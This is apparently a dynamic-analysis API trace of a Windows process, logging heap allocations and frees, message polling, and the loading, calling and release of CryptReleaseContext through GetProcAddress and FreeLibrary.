0 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0128.836] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.836] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0128.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0128.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0128.838] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0128.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.839] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0128.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0128.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0128.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.841] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0128.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0128.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0128.844] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.844] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0128.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0128.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0128.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.847] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.847] FreeLibrary (hLibModule=0x756e0000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 